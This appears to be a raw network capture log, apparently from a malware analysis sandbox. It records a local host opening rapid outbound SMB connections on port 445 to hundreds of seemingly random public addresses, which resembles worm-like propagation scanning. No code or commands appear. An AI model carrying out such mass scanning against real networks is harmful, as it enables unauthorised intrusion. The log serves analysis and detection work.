Apr 29, 2023 00:53:39.762825966 CEST	51218	445	192.168.2.4	44.43.4.139
Apr 29, 2023 00:53:39.762969971 CEST	51221	445	192.168.2.4	11.85.76.203
Apr 29, 2023 00:53:39.762974024 CEST	51220	445	192.168.2.4	173.42.98.96
Apr 29, 2023 00:53:39.996377945 CEST	51222	445	192.168.2.4	126.93.12.158
Apr 29, 2023 00:53:39.996401072 CEST	51223	445	192.168.2.4	139.218.7.110
Apr 29, 2023 00:53:39.996483088 CEST	51224	445	192.168.2.4	175.35.30.31
Apr 29, 2023 00:53:39.996539116 CEST	51225	445	192.168.2.4	138.33.44.142
Apr 29, 2023 00:53:39.996844053 CEST	51226	445	192.168.2.4	189.1.229.50
Apr 29, 2023 00:53:40.121260881 CEST	51229	445	192.168.2.4	70.63.80.22
Apr 29, 2023 00:53:40.121315956 CEST	51230	445	192.168.2.4	30.226.16.250
Apr 29, 2023 00:53:40.168457985 CEST	51231	445	192.168.2.4	38.252.129.58
Apr 29, 2023 00:53:40.169456005 CEST	51232	445	192.168.2.4	141.53.210.156
Apr 29, 2023 00:53:40.169996023 CEST	51233	445	192.168.2.4	105.13.88.159
Apr 29, 2023 00:53:40.170953035 CEST	51234	445	192.168.2.4	148.49.227.102
Apr 29, 2023 00:53:40.171469927 CEST	51235	445	192.168.2.4	54.233.231.112
Apr 29, 2023 00:53:40.172399044 CEST	51236	445	192.168.2.4	36.83.56.99
Apr 29, 2023 00:53:40.173017025 CEST	51237	445	192.168.2.4	204.162.176.249
Apr 29, 2023 00:53:40.247129917 CEST	51239	445	192.168.2.4	213.17.129.161
Apr 29, 2023 00:53:40.326889038 CEST	51241	445	192.168.2.4	211.254.206.205
Apr 29, 2023 00:53:40.326900959 CEST	51240	445	192.168.2.4	218.110.60.37
Apr 29, 2023 00:53:40.327047110 CEST	51242	445	192.168.2.4	149.210.132.204
Apr 29, 2023 00:53:40.434099913 CEST	51243	445	192.168.2.4	213.22.63.83
Apr 29, 2023 00:53:40.450006008 CEST	51244	445	192.168.2.4	159.10.7.120
Apr 29, 2023 00:53:40.450030088 CEST	51245	445	192.168.2.4	55.217.211.20
Apr 29, 2023 00:53:40.652477026 CEST	51248	445	192.168.2.4	122.74.50.16
Apr 29, 2023 00:53:40.652502060 CEST	51247	445	192.168.2.4	199.215.137.239
Apr 29, 2023 00:53:40.746143103 CEST	51250	445	192.168.2.4	112.31.123.200
Apr 29, 2023 00:53:40.780688047 CEST	445	50409	38.94.43.48	192.168.2.4
Apr 29, 2023 00:53:40.793524027 CEST	51252	445	192.168.2.4	34.49.142.232
Apr 29, 2023 00:53:40.793528080 CEST	51251	445	192.168.2.4	96.169.176.159
Apr 29, 2023 00:53:40.871201992 CEST	51254	445	192.168.2.4	114.50.220.248
Apr 29, 2023 00:53:40.871215105 CEST	51253	445	192.168.2.4	187.159.51.153
Apr 29, 2023 00:53:40.871357918 CEST	51255	445	192.168.2.4	101.202.224.217
Apr 29, 2023 00:53:40.871520996 CEST	51256	445	192.168.2.4	201.39.12.117
Apr 29, 2023 00:53:40.871596098 CEST	51258	445	192.168.2.4	152.242.34.95
Apr 29, 2023 00:53:40.871697903 CEST	51259	445	192.168.2.4	34.131.244.56
Apr 29, 2023 00:53:41.105564117 CEST	51260	445	192.168.2.4	203.68.137.110
Apr 29, 2023 00:53:41.105726004 CEST	51261	445	192.168.2.4	113.211.172.54
Apr 29, 2023 00:53:41.105793953 CEST	51262	445	192.168.2.4	206.90.168.31
Apr 29, 2023 00:53:41.105896950 CEST	51263	445	192.168.2.4	20.126.194.50
Apr 29, 2023 00:53:41.105948925 CEST	51264	445	192.168.2.4	181.127.87.62
Apr 29, 2023 00:53:41.246447086 CEST	51267	445	192.168.2.4	67.161.59.88
Apr 29, 2023 00:53:41.246676922 CEST	51268	445	192.168.2.4	137.122.252.177
Apr 29, 2023 00:53:41.294971943 CEST	51269	445	192.168.2.4	217.125.204.116
Apr 29, 2023 00:53:41.295336962 CEST	51270	445	192.168.2.4	188.224.147.234
Apr 29, 2023 00:53:41.295479059 CEST	51271	445	192.168.2.4	158.174.91.119
Apr 29, 2023 00:53:41.295578957 CEST	51273	445	192.168.2.4	26.130.9.28
Apr 29, 2023 00:53:41.295665979 CEST	51275	445	192.168.2.4	184.215.8.240
Apr 29, 2023 00:53:41.295671940 CEST	51272	445	192.168.2.4	56.123.10.198
Apr 29, 2023 00:53:41.295695066 CEST	51274	445	192.168.2.4	155.95.197.242
Apr 29, 2023 00:53:41.371520042 CEST	51277	445	192.168.2.4	210.40.254.83
Apr 29, 2023 00:53:41.450546026 CEST	51279	445	192.168.2.4	209.208.61.232
Apr 29, 2023 00:53:41.450562000 CEST	51278	445	192.168.2.4	53.57.156.150
Apr 29, 2023 00:53:41.451145887 CEST	51280	445	192.168.2.4	22.213.229.67
Apr 29, 2023 00:53:41.543292046 CEST	51281	445	192.168.2.4	88.141.161.23
Apr 29, 2023 00:53:41.559346914 CEST	51283	445	192.168.2.4	171.152.132.194
Apr 29, 2023 00:53:41.559564114 CEST	51284	445	192.168.2.4	148.223.165.191
Apr 29, 2023 00:53:41.762212992 CEST	51286	445	192.168.2.4	132.236.85.81
Apr 29, 2023 00:53:41.762212992 CEST	51285	445	192.168.2.4	220.50.226.11
Apr 29, 2023 00:53:41.855722904 CEST	51288	445	192.168.2.4	155.43.184.2
Apr 29, 2023 00:53:41.918478012 CEST	51290	445	192.168.2.4	143.184.10.240
Apr 29, 2023 00:53:41.918482065 CEST	51289	445	192.168.2.4	199.183.13.43
Apr 29, 2023 00:53:41.981030941 CEST	51291	445	192.168.2.4	31.22.183.81
Apr 29, 2023 00:53:41.981091976 CEST	51292	445	192.168.2.4	36.91.207.110
Apr 29, 2023 00:53:41.981349945 CEST	51293	445	192.168.2.4	221.220.124.62
Apr 29, 2023 00:53:41.981498957 CEST	51295	445	192.168.2.4	115.173.29.45
Apr 29, 2023 00:53:41.981621027 CEST	51296	445	192.168.2.4	75.162.133.219
Apr 29, 2023 00:53:41.981722116 CEST	51297	445	192.168.2.4	149.79.48.114
Apr 29, 2023 00:53:42.230808020 CEST	51300	445	192.168.2.4	74.150.121.217
Apr 29, 2023 00:53:42.230968952 CEST	51299	445	192.168.2.4	188.30.249.207
Apr 29, 2023 00:53:42.230984926 CEST	51301	445	192.168.2.4	203.234.88.221
Apr 29, 2023 00:53:42.231125116 CEST	51302	445	192.168.2.4	32.119.9.11
Apr 29, 2023 00:53:42.231147051 CEST	51303	445	192.168.2.4	172.101.128.182
Apr 29, 2023 00:53:42.356024981 CEST	51306	445	192.168.2.4	43.79.81.193
Apr 29, 2023 00:53:42.356232882 CEST	51307	445	192.168.2.4	212.40.182.252
Apr 29, 2023 00:53:42.421957970 CEST	51309	445	192.168.2.4	165.30.230.110
Apr 29, 2023 00:53:42.421982050 CEST	51308	445	192.168.2.4	197.193.110.1
Apr 29, 2023 00:53:42.422141075 CEST	51312	445	192.168.2.4	107.116.28.208
Apr 29, 2023 00:53:42.422141075 CEST	51310	445	192.168.2.4	89.152.91.100
Apr 29, 2023 00:53:42.422226906 CEST	51311	445	192.168.2.4	216.38.204.29
Apr 29, 2023 00:53:42.422230005 CEST	51313	445	192.168.2.4	169.73.100.49
Apr 29, 2023 00:53:42.422300100 CEST	51314	445	192.168.2.4	75.163.113.221
Apr 29, 2023 00:53:42.496426105 CEST	51316	445	192.168.2.4	164.143.91.218
Apr 29, 2023 00:53:42.575146914 CEST	51317	445	192.168.2.4	70.76.69.81
Apr 29, 2023 00:53:42.575146914 CEST	51318	445	192.168.2.4	188.52.110.232
Apr 29, 2023 00:53:42.575265884 CEST	51319	445	192.168.2.4	135.192.0.5
Apr 29, 2023 00:53:42.668962955 CEST	51320	445	192.168.2.4	197.162.101.95
Apr 29, 2023 00:53:42.684501886 CEST	51323	445	192.168.2.4	147.73.32.118
Apr 29, 2023 00:53:42.684580088 CEST	51322	445	192.168.2.4	108.94.46.196
Apr 29, 2023 00:53:42.887188911 CEST	51324	445	192.168.2.4	171.190.35.49
Apr 29, 2023 00:53:42.887435913 CEST	51325	445	192.168.2.4	154.210.74.252
Apr 29, 2023 00:53:42.982223034 CEST	51327	445	192.168.2.4	128.187.49.39
Apr 29, 2023 00:53:43.044230938 CEST	51328	445	192.168.2.4	71.252.199.153
Apr 29, 2023 00:53:43.044481993 CEST	51329	445	192.168.2.4	151.226.197.141
Apr 29, 2023 00:53:43.090827942 CEST	51330	445	192.168.2.4	56.99.135.13
Apr 29, 2023 00:53:43.091485977 CEST	51331	445	192.168.2.4	50.248.126.170
Apr 29, 2023 00:53:43.092180014 CEST	51332	445	192.168.2.4	152.7.174.208
Apr 29, 2023 00:53:43.093172073 CEST	51334	445	192.168.2.4	69.56.208.253
Apr 29, 2023 00:53:43.093722105 CEST	51335	445	192.168.2.4	133.231.84.191
Apr 29, 2023 00:53:43.094408035 CEST	51336	445	192.168.2.4	104.46.29.165
Apr 29, 2023 00:53:43.340281010 CEST	51338	445	192.168.2.4	197.156.119.163
Apr 29, 2023 00:53:43.340434074 CEST	51339	445	192.168.2.4	124.205.13.138
Apr 29, 2023 00:53:43.340650082 CEST	51340	445	192.168.2.4	196.110.21.201
Apr 29, 2023 00:53:43.340986013 CEST	51341	445	192.168.2.4	36.160.181.44
Apr 29, 2023 00:53:43.341197968 CEST	51342	445	192.168.2.4	56.129.219.28
Apr 29, 2023 00:53:43.483227015 CEST	51345	445	192.168.2.4	165.27.88.107
Apr 29, 2023 00:53:43.483500004 CEST	51346	445	192.168.2.4	202.70.11.178
Apr 29, 2023 00:53:43.543874025 CEST	51347	445	192.168.2.4	76.3.34.76
Apr 29, 2023 00:53:43.544511080 CEST	51348	445	192.168.2.4	65.85.74.180
Apr 29, 2023 00:53:43.545341015 CEST	51349	445	192.168.2.4	55.134.216.6
Apr 29, 2023 00:53:43.546072960 CEST	51350	445	192.168.2.4	188.84.170.196
Apr 29, 2023 00:53:43.547013044 CEST	51351	445	192.168.2.4	112.176.88.172
Apr 29, 2023 00:53:43.547856092 CEST	51352	445	192.168.2.4	21.34.64.56
Apr 29, 2023 00:53:43.548722982 CEST	51353	445	192.168.2.4	46.98.48.96
Apr 29, 2023 00:53:43.621524096 CEST	51354	445	192.168.2.4	12.77.124.22
Apr 29, 2023 00:53:43.699604988 CEST	51357	445	192.168.2.4	64.95.188.138
Apr 29, 2023 00:53:43.699789047 CEST	51358	445	192.168.2.4	39.114.149.147
Apr 29, 2023 00:53:43.699807882 CEST	51356	445	192.168.2.4	109.170.165.137
Apr 29, 2023 00:53:43.793688059 CEST	51359	445	192.168.2.4	202.150.94.44
Apr 29, 2023 00:53:43.810478926 CEST	51361	445	192.168.2.4	28.176.24.75
Apr 29, 2023 00:53:43.810543060 CEST	51362	445	192.168.2.4	164.11.142.240
Apr 29, 2023 00:53:43.996663094 CEST	51363	445	192.168.2.4	205.66.226.129
Apr 29, 2023 00:53:43.996814966 CEST	51364	445	192.168.2.4	183.10.12.153
Apr 29, 2023 00:53:44.106348038 CEST	51367	445	192.168.2.4	212.106.17.42
Apr 29, 2023 00:53:44.168450117 CEST	51368	445	192.168.2.4	54.18.85.33
Apr 29, 2023 00:53:44.168715000 CEST	51369	445	192.168.2.4	98.71.64.37
Apr 29, 2023 00:53:44.215468884 CEST	51371	445	192.168.2.4	145.10.177.137
Apr 29, 2023 00:53:44.215495110 CEST	51370	445	192.168.2.4	204.7.145.177
Apr 29, 2023 00:53:44.215637922 CEST	51372	445	192.168.2.4	49.156.18.103
Apr 29, 2023 00:53:44.215871096 CEST	51374	445	192.168.2.4	67.163.15.152
Apr 29, 2023 00:53:44.215986967 CEST	51375	445	192.168.2.4	95.220.51.17
Apr 29, 2023 00:53:44.216113091 CEST	51376	445	192.168.2.4	107.115.43.6
Apr 29, 2023 00:53:44.465616941 CEST	51379	445	192.168.2.4	130.31.35.166
Apr 29, 2023 00:53:44.465629101 CEST	51378	445	192.168.2.4	152.121.66.139
Apr 29, 2023 00:53:44.465728045 CEST	51380	445	192.168.2.4	7.237.83.105
Apr 29, 2023 00:53:44.465913057 CEST	51381	445	192.168.2.4	86.3.190.3
Apr 29, 2023 00:53:44.466033936 CEST	51382	445	192.168.2.4	183.162.154.209
Apr 29, 2023 00:53:44.593286037 CEST	51385	445	192.168.2.4	218.78.8.33
Apr 29, 2023 00:53:44.593552113 CEST	51386	445	192.168.2.4	80.156.168.174
Apr 29, 2023 00:53:44.668802977 CEST	51387	445	192.168.2.4	32.107.86.180
Apr 29, 2023 00:53:44.669420958 CEST	51388	445	192.168.2.4	99.107.123.254
Apr 29, 2023 00:53:44.670214891 CEST	51389	445	192.168.2.4	164.91.158.59
Apr 29, 2023 00:53:44.670736074 CEST	51390	445	192.168.2.4	151.63.200.3
Apr 29, 2023 00:53:44.671842098 CEST	51391	445	192.168.2.4	191.207.96.130
Apr 29, 2023 00:53:44.671958923 CEST	51392	445	192.168.2.4	39.200.182.23
Apr 29, 2023 00:53:44.672030926 CEST	51393	445	192.168.2.4	166.230.26.22
Apr 29, 2023 00:53:44.746745110 CEST	51395	445	192.168.2.4	5.94.58.73
Apr 29, 2023 00:53:44.824954033 CEST	51396	445	192.168.2.4	80.232.61.147
Apr 29, 2023 00:53:44.824955940 CEST	51397	445	192.168.2.4	108.55.115.248
Apr 29, 2023 00:53:44.825102091 CEST	51398	445	192.168.2.4	211.170.222.239
Apr 29, 2023 00:53:44.918389082 CEST	51399	445	192.168.2.4	1.138.162.28
Apr 29, 2023 00:53:44.934180975 CEST	51401	445	192.168.2.4	39.166.234.74
Apr 29, 2023 00:53:44.934448957 CEST	51402	445	192.168.2.4	6.221.163.161
Apr 29, 2023 00:53:45.107172012 CEST	51404	445	192.168.2.4	39.231.98.50
Apr 29, 2023 00:53:45.234191895 CEST	51407	445	192.168.2.4	207.44.251.38
Apr 29, 2023 00:53:45.293447971 CEST	51409	445	192.168.2.4	205.107.60.0
Apr 29, 2023 00:53:45.293489933 CEST	51408	445	192.168.2.4	221.208.132.167
Apr 29, 2023 00:53:45.340406895 CEST	51410	445	192.168.2.4	207.57.252.189
Apr 29, 2023 00:53:45.340605021 CEST	51411	445	192.168.2.4	7.243.143.65
Apr 29, 2023 00:53:45.340817928 CEST	51412	445	192.168.2.4	193.148.135.83
Apr 29, 2023 00:53:45.341214895 CEST	51414	445	192.168.2.4	30.10.60.122
Apr 29, 2023 00:53:45.341351032 CEST	51415	445	192.168.2.4	79.249.134.63
Apr 29, 2023 00:53:45.341548920 CEST	51416	445	192.168.2.4	74.20.67.106
Apr 29, 2023 00:53:45.574742079 CEST	51418	445	192.168.2.4	109.79.116.15
Apr 29, 2023 00:53:45.574961901 CEST	51419	445	192.168.2.4	50.121.213.194
Apr 29, 2023 00:53:45.575145006 CEST	51420	445	192.168.2.4	35.200.231.237
Apr 29, 2023 00:53:45.575280905 CEST	51421	445	192.168.2.4	196.112.68.130
Apr 29, 2023 00:53:45.575387001 CEST	51422	445	192.168.2.4	3.48.18.204
Apr 29, 2023 00:53:45.699801922 CEST	51425	445	192.168.2.4	26.33.48.209
Apr 29, 2023 00:53:45.699990988 CEST	51426	445	192.168.2.4	216.1.215.189
Apr 29, 2023 00:53:45.778798103 CEST	51427	445	192.168.2.4	70.60.112.49
Apr 29, 2023 00:53:45.779541016 CEST	51428	445	192.168.2.4	137.43.156.13
Apr 29, 2023 00:53:45.780082941 CEST	51429	445	192.168.2.4	215.108.88.59
Apr 29, 2023 00:53:45.780864954 CEST	51430	445	192.168.2.4	99.161.124.78
Apr 29, 2023 00:53:45.781472921 CEST	51431	445	192.168.2.4	10.74.84.252
Apr 29, 2023 00:53:45.782362938 CEST	51432	445	192.168.2.4	162.85.56.254
Apr 29, 2023 00:53:45.782869101 CEST	51433	445	192.168.2.4	135.146.241.27
Apr 29, 2023 00:53:45.856086016 CEST	51434	445	192.168.2.4	13.93.248.28
Apr 29, 2023 00:53:45.935170889 CEST	51436	445	192.168.2.4	143.121.108.18
Apr 29, 2023 00:53:45.935425043 CEST	51437	445	192.168.2.4	159.35.77.244
Apr 29, 2023 00:53:45.935789108 CEST	51438	445	192.168.2.4	179.29.47.35
Apr 29, 2023 00:53:46.103964090 CEST	51439	445	192.168.2.4	13.194.40.208
Apr 29, 2023 00:53:46.103964090 CEST	51440	445	192.168.2.4	68.214.233.156
Apr 29, 2023 00:53:46.104394913 CEST	51442	445	192.168.2.4	128.57.179.40
Apr 29, 2023 00:53:46.231358051 CEST	51445	445	192.168.2.4	167.232.55.199
Apr 29, 2023 00:53:46.231487036 CEST	51444	445	192.168.2.4	106.212.68.96
Apr 29, 2023 00:53:46.341208935 CEST	51448	445	192.168.2.4	65.187.27.174
Apr 29, 2023 00:53:46.410501957 CEST	51449	445	192.168.2.4	24.20.54.208
Apr 29, 2023 00:53:46.410763025 CEST	51450	445	192.168.2.4	123.225.129.90
Apr 29, 2023 00:53:46.450054884 CEST	51451	445	192.168.2.4	46.163.192.173
Apr 29, 2023 00:53:46.450061083 CEST	51452	445	192.168.2.4	190.181.172.247
Apr 29, 2023 00:53:46.450225115 CEST	51453	445	192.168.2.4	213.189.48.76
Apr 29, 2023 00:53:46.450469017 CEST	51455	445	192.168.2.4	194.111.253.35
Apr 29, 2023 00:53:46.450596094 CEST	51456	445	192.168.2.4	199.214.28.14
Apr 29, 2023 00:53:46.450691938 CEST	51457	445	192.168.2.4	107.152.242.222
Apr 29, 2023 00:53:46.687616110 CEST	51459	445	192.168.2.4	166.68.142.153
Apr 29, 2023 00:53:46.687889099 CEST	51460	445	192.168.2.4	162.114.193.189
Apr 29, 2023 00:53:46.688358068 CEST	51461	445	192.168.2.4	196.39.11.234
Apr 29, 2023 00:53:46.688514948 CEST	51462	445	192.168.2.4	34.52.248.14
Apr 29, 2023 00:53:46.688885927 CEST	51463	445	192.168.2.4	171.186.171.110
Apr 29, 2023 00:53:46.810297966 CEST	51466	445	192.168.2.4	116.221.144.195
Apr 29, 2023 00:53:46.810302019 CEST	51467	445	192.168.2.4	33.128.139.95
Apr 29, 2023 00:53:46.919480085 CEST	51468	445	192.168.2.4	206.4.190.121
Apr 29, 2023 00:53:46.920860052 CEST	51469	445	192.168.2.4	30.27.245.19
Apr 29, 2023 00:53:46.921475887 CEST	51470	445	192.168.2.4	31.247.164.234
Apr 29, 2023 00:53:46.922291040 CEST	51471	445	192.168.2.4	153.57.254.201
Apr 29, 2023 00:53:46.923199892 CEST	51472	445	192.168.2.4	213.106.167.2
Apr 29, 2023 00:53:46.924005032 CEST	51473	445	192.168.2.4	194.210.244.167
Apr 29, 2023 00:53:46.924560070 CEST	51474	445	192.168.2.4	117.62.67.89
Apr 29, 2023 00:53:46.965920925 CEST	51475	445	192.168.2.4	78.200.130.107
Apr 29, 2023 00:53:47.064091921 CEST	51478	445	192.168.2.4	173.71.27.122
Apr 29, 2023 00:53:47.064109087 CEST	51477	445	192.168.2.4	134.131.141.36
Apr 29, 2023 00:53:47.064233065 CEST	51479	445	192.168.2.4	146.194.155.51
Apr 29, 2023 00:53:47.216351032 CEST	51480	445	192.168.2.4	218.11.75.112
Apr 29, 2023 00:53:47.216501951 CEST	51481	445	192.168.2.4	65.206.230.60
Apr 29, 2023 00:53:47.217019081 CEST	51483	445	192.168.2.4	113.219.114.192
Apr 29, 2023 00:53:47.357117891 CEST	51485	445	192.168.2.4	57.132.48.65
Apr 29, 2023 00:53:47.357516050 CEST	51486	445	192.168.2.4	51.15.34.144
Apr 29, 2023 00:53:47.466214895 CEST	51489	445	192.168.2.4	146.213.66.11
Apr 29, 2023 00:53:47.512614012 CEST	51490	445	192.168.2.4	95.37.143.51
Apr 29, 2023 00:53:47.512754917 CEST	51491	445	192.168.2.4	54.203.128.36
Apr 29, 2023 00:53:47.559967995 CEST	51492	445	192.168.2.4	185.179.60.219
Apr 29, 2023 00:53:47.560923100 CEST	51493	445	192.168.2.4	26.105.98.22
Apr 29, 2023 00:53:47.561789989 CEST	51494	445	192.168.2.4	143.10.192.33
Apr 29, 2023 00:53:47.562772036 CEST	51496	445	192.168.2.4	78.133.172.114
Apr 29, 2023 00:53:47.562988997 CEST	51497	445	192.168.2.4	160.63.239.26
Apr 29, 2023 00:53:47.811841965 CEST	51502	445	192.168.2.4	102.77.176.169
Apr 29, 2023 00:53:47.811966896 CEST	51503	445	192.168.2.4	183.210.189.252
Apr 29, 2023 00:53:47.812028885 CEST	51504	445	192.168.2.4	138.112.44.213
Apr 29, 2023 00:53:47.812227011 CEST	51505	445	192.168.2.4	60.231.185.234
Apr 29, 2023 00:53:47.812237978 CEST	51506	445	192.168.2.4	211.93.123.175
Apr 29, 2023 00:53:47.936146021 CEST	51507	445	192.168.2.4	221.250.63.213
Apr 29, 2023 00:53:47.936516047 CEST	51508	445	192.168.2.4	106.208.121.183
Apr 29, 2023 00:53:48.045747042 CEST	51509	445	192.168.2.4	161.88.213.213
Apr 29, 2023 00:53:48.045846939 CEST	51510	445	192.168.2.4	65.91.66.149
Apr 29, 2023 00:53:48.046057940 CEST	51511	445	192.168.2.4	213.218.226.200
Apr 29, 2023 00:53:48.046117067 CEST	51512	445	192.168.2.4	191.2.66.166
Apr 29, 2023 00:53:48.046200991 CEST	51514	445	192.168.2.4	99.210.93.30
Apr 29, 2023 00:53:48.046222925 CEST	51515	445	192.168.2.4	136.230.152.226
Apr 29, 2023 00:53:48.046237946 CEST	51513	445	192.168.2.4	163.48.4.98
Apr 29, 2023 00:53:48.075341940 CEST	51517	445	192.168.2.4	27.0.89.243
Apr 29, 2023 00:53:48.184350014 CEST	51519	445	192.168.2.4	82.242.83.6
Apr 29, 2023 00:53:48.184499025 CEST	51520	445	192.168.2.4	104.197.236.181
Apr 29, 2023 00:53:48.184670925 CEST	51521	445	192.168.2.4	140.72.7.53
Apr 29, 2023 00:53:48.341332912 CEST	51522	445	192.168.2.4	161.55.197.220
Apr 29, 2023 00:53:48.341681957 CEST	51523	445	192.168.2.4	213.245.25.56
Apr 29, 2023 00:53:48.342372894 CEST	51525	445	192.168.2.4	18.48.201.138
Apr 29, 2023 00:53:48.481206894 CEST	51527	445	192.168.2.4	180.26.56.57
Apr 29, 2023 00:53:48.481206894 CEST	51528	445	192.168.2.4	117.34.232.150
Apr 29, 2023 00:53:48.590625048 CEST	51531	445	192.168.2.4	85.175.64.86
Apr 29, 2023 00:53:48.637654066 CEST	51532	445	192.168.2.4	46.84.241.30
Apr 29, 2023 00:53:48.637855053 CEST	51533	445	192.168.2.4	14.101.171.219
Apr 29, 2023 00:53:48.685153961 CEST	51534	445	192.168.2.4	97.141.197.64
Apr 29, 2023 00:53:48.685162067 CEST	51535	445	192.168.2.4	69.76.188.246
Apr 29, 2023 00:53:48.685317039 CEST	51536	445	192.168.2.4	120.18.30.159
Apr 29, 2023 00:53:48.685442924 CEST	51537	445	192.168.2.4	133.126.46.192
Apr 29, 2023 00:53:48.685638905 CEST	51539	445	192.168.2.4	137.116.145.209
Apr 29, 2023 00:53:48.685846090 CEST	51540	445	192.168.2.4	25.8.156.106
Apr 29, 2023 00:53:48.892095089 CEST	445	51535	69.76.188.246	192.168.2.4
Apr 29, 2023 00:53:48.943864107 CEST	51545	445	192.168.2.4	98.107.183.177
Apr 29, 2023 00:53:48.943886042 CEST	51544	445	192.168.2.4	199.91.205.208
Apr 29, 2023 00:53:48.944009066 CEST	51546	445	192.168.2.4	32.50.63.39
Apr 29, 2023 00:53:48.944169044 CEST	51548	445	192.168.2.4	25.157.36.69
Apr 29, 2023 00:53:48.944211960 CEST	51547	445	192.168.2.4	96.222.46.204
Apr 29, 2023 00:53:49.059700012 CEST	51549	445	192.168.2.4	19.14.25.41
Apr 29, 2023 00:53:49.059715986 CEST	51550	445	192.168.2.4	2.107.165.12
Apr 29, 2023 00:53:49.169857979 CEST	51551	445	192.168.2.4	172.238.160.108
Apr 29, 2023 00:53:49.170547962 CEST	51552	445	192.168.2.4	150.49.205.195
Apr 29, 2023 00:53:49.171679020 CEST	51553	445	192.168.2.4	111.173.240.3
Apr 29, 2023 00:53:49.172419071 CEST	51554	445	192.168.2.4	167.22.12.0
Apr 29, 2023 00:53:49.172913074 CEST	51555	445	192.168.2.4	66.155.112.116
Apr 29, 2023 00:53:49.185015917 CEST	51556	445	192.168.2.4	204.171.75.94
Apr 29, 2023 00:53:49.185128927 CEST	51557	445	192.168.2.4	114.61.165.43
Apr 29, 2023 00:53:49.200418949 CEST	51559	445	192.168.2.4	76.180.208.143
Apr 29, 2023 00:53:49.293817043 CEST	51561	445	192.168.2.4	68.213.136.92
Apr 29, 2023 00:53:49.293859005 CEST	51562	445	192.168.2.4	26.114.194.68
Apr 29, 2023 00:53:49.294064045 CEST	51563	445	192.168.2.4	12.203.37.175
Apr 29, 2023 00:53:49.402925968 CEST	51535	445	192.168.2.4	69.76.188.246
Apr 29, 2023 00:53:49.465761900 CEST	51565	445	192.168.2.4	66.178.19.93
Apr 29, 2023 00:53:49.465840101 CEST	51564	445	192.168.2.4	199.224.217.155
Apr 29, 2023 00:53:49.465965033 CEST	51567	445	192.168.2.4	149.74.95.146
Apr 29, 2023 00:53:49.590926886 CEST	51570	445	192.168.2.4	147.145.134.229
Apr 29, 2023 00:53:49.590965033 CEST	51569	445	192.168.2.4	125.148.136.47
Apr 29, 2023 00:53:49.605705023 CEST	445	51535	69.76.188.246	192.168.2.4
Apr 29, 2023 00:53:49.700122118 CEST	51573	445	192.168.2.4	207.193.138.36
Apr 29, 2023 00:53:49.747308969 CEST	51574	445	192.168.2.4	178.102.191.39
Apr 29, 2023 00:53:49.747524977 CEST	51575	445	192.168.2.4	83.144.253.141
Apr 29, 2023 00:53:49.794037104 CEST	51576	445	192.168.2.4	223.124.135.174
Apr 29, 2023 00:53:49.794239044 CEST	51577	445	192.168.2.4	181.242.86.126
Apr 29, 2023 00:53:49.794593096 CEST	51578	445	192.168.2.4	189.40.89.127
Apr 29, 2023 00:53:49.794787884 CEST	51579	445	192.168.2.4	71.145.49.59
Apr 29, 2023 00:53:49.795332909 CEST	51581	445	192.168.2.4	26.142.238.234
Apr 29, 2023 00:53:49.795850039 CEST	51582	445	192.168.2.4	107.214.205.99
Apr 29, 2023 00:53:50.044409990 CEST	51586	445	192.168.2.4	144.57.245.125
Apr 29, 2023 00:53:50.044687986 CEST	51587	445	192.168.2.4	215.67.90.119
Apr 29, 2023 00:53:50.044837952 CEST	51588	445	192.168.2.4	85.206.224.182
Apr 29, 2023 00:53:50.045052052 CEST	51589	445	192.168.2.4	220.90.76.215
Apr 29, 2023 00:53:50.045316935 CEST	51590	445	192.168.2.4	174.16.108.26
Apr 29, 2023 00:53:50.169450045 CEST	51592	445	192.168.2.4	156.1.149.222
Apr 29, 2023 00:53:50.169744015 CEST	51593	445	192.168.2.4	47.48.91.186
Apr 29, 2023 00:53:50.294934034 CEST	51594	445	192.168.2.4	95.89.69.44
Apr 29, 2023 00:53:50.295434952 CEST	51595	445	192.168.2.4	4.189.40.198
Apr 29, 2023 00:53:50.296327114 CEST	51596	445	192.168.2.4	61.147.26.77
Apr 29, 2023 00:53:50.297065973 CEST	51597	445	192.168.2.4	148.101.8.32
Apr 29, 2023 00:53:50.298089027 CEST	51598	445	192.168.2.4	218.162.237.210
Apr 29, 2023 00:53:50.309726000 CEST	51599	445	192.168.2.4	168.21.247.129
Apr 29, 2023 00:53:50.310456038 CEST	51601	445	192.168.2.4	14.178.187.57
Apr 29, 2023 00:53:50.311137915 CEST	51602	445	192.168.2.4	174.148.202.219
Apr 29, 2023 00:53:50.403707027 CEST	51604	445	192.168.2.4	40.177.52.23
Apr 29, 2023 00:53:50.403999090 CEST	51605	445	192.168.2.4	213.123.23.187
Apr 29, 2023 00:53:50.404556990 CEST	51606	445	192.168.2.4	80.182.79.94
Apr 29, 2023 00:53:50.575474977 CEST	51608	445	192.168.2.4	214.106.223.39
Apr 29, 2023 00:53:50.575499058 CEST	51607	445	192.168.2.4	170.68.153.174
Apr 29, 2023 00:53:50.575858116 CEST	51610	445	192.168.2.4	149.104.225.112
Apr 29, 2023 00:53:50.700670004 CEST	51613	445	192.168.2.4	219.234.106.237
Apr 29, 2023 00:53:50.700678110 CEST	51612	445	192.168.2.4	160.159.160.123
Apr 29, 2023 00:53:50.814003944 CEST	51616	445	192.168.2.4	92.151.213.122
Apr 29, 2023 00:53:50.857244015 CEST	51618	445	192.168.2.4	178.153.209.228
Apr 29, 2023 00:53:50.857256889 CEST	51617	445	192.168.2.4	160.106.202.127
Apr 29, 2023 00:53:50.903418064 CEST	51619	445	192.168.2.4	81.64.205.207
Apr 29, 2023 00:53:50.903585911 CEST	51620	445	192.168.2.4	16.142.123.78
Apr 29, 2023 00:53:50.903790951 CEST	51621	445	192.168.2.4	213.13.198.189
Apr 29, 2023 00:53:50.903841019 CEST	51622	445	192.168.2.4	43.11.111.79
Apr 29, 2023 00:53:50.904020071 CEST	51623	445	192.168.2.4	158.113.142.211
Apr 29, 2023 00:53:50.904169083 CEST	51625	445	192.168.2.4	188.234.46.2
Apr 29, 2023 00:53:51.169747114 CEST	51630	445	192.168.2.4	81.242.60.10
Apr 29, 2023 00:53:51.169753075 CEST	51629	445	192.168.2.4	32.227.197.52
Apr 29, 2023 00:53:51.169950008 CEST	51631	445	192.168.2.4	200.186.17.226
Apr 29, 2023 00:53:51.170089960 CEST	51632	445	192.168.2.4	144.110.35.235
Apr 29, 2023 00:53:51.170312881 CEST	51633	445	192.168.2.4	96.95.191.28
Apr 29, 2023 00:53:51.294809103 CEST	51635	445	192.168.2.4	76.57.45.42
Apr 29, 2023 00:53:51.294997931 CEST	51636	445	192.168.2.4	107.68.26.146
Apr 29, 2023 00:53:51.429151058 CEST	51637	445	192.168.2.4	13.221.123.209
